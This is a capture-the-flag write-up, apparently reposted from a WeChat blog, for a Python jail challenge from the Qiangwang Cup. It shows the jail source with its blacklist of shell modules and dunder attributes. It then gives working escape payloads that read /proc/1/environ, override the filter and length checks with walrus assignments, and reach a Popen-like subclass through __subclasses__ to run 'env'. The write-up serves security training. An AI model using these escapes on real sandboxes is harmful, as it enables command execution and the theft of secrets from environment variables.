Python Version:python3.10Source Code:importcode, os, subprocessimportptydefblacklist_fun_callback(*args):print("Player! It's already banned!")pty.spawn = blacklist_fun_callbackos.system = blacklist_fun_callbackos.popen = blacklist_fun_callbacksubprocess.Popen = blacklist_fun_callbacksubprocess.call = blacklist_fun_callbackcode.interact = blacklist_fun_callbackcode.compile_command = blacklist_fun_callbackvars = blacklist_fun_callbackattr = blacklist_fun_callbackdir = blacklist_fun_callbackgetattr = blacklist_fun_callbackexec= blacklist_fun_callback__import__ = blacklist_fun_callbackcompile = blacklist_fun_callbackbreakpoint = blacklist_fun_callbackdelos, subprocess, code, pty, blacklist_fun_callbackinput_code = input("Can u input your code to escape > ")blacklist_words = ["subprocess","os","code","interact","pty","pdb","platform","importlib","timeit","imp","commands","popen","load_module","spawn","system","/bin/sh","/bin/bash","flag","eval","exec","compile","input","vars","attr","dir","getattr""__import__","__builtins__","__getattribute__","__class__","__base__","__subclasses__","__getitem__","__self__","__globals__","__init__","__name__","__dict__","._module","builtins","breakpoint","import",]defmy_filter(input_code):forxinblacklist_words:ifxininput_code:returnFalsereturnTruewhile'{'ininput_codeand'}'ininput_codeandinput_code.isascii()andmy_filter(input_code)and"eval"notininput_codeandlen(input_code) <65:input_code = eval(f"f'{input_code}'")else:print("Player! Please obey the filter rules which I set!")
'{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65输入的内容需要包含{},不能存在my_filter内的内容,长度还需小于65。
{print(open("/proc/1/environ").read())}
使用海象表达式替换掉my_filter函数,input函数绕过长度限制。
{(my_filter:=str,1)[1]}{{inpu{chr(116)}()}}获取所有子类:{print([].__class__.__base__.__subclasses__())}
{(my_filter:=len,len:=any,1)[2]}{{{chr(105)}nput()}}使用popen执行env命令:{print([].__class__.__base__.__subclasses__()[-1]("env"))}
原文始发于微信公众号(皓月的笔记本):【靶场合集】CTF-第七届强网杯全国网络安全挑战赛:Pyjail ! It's myFILTER !!!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论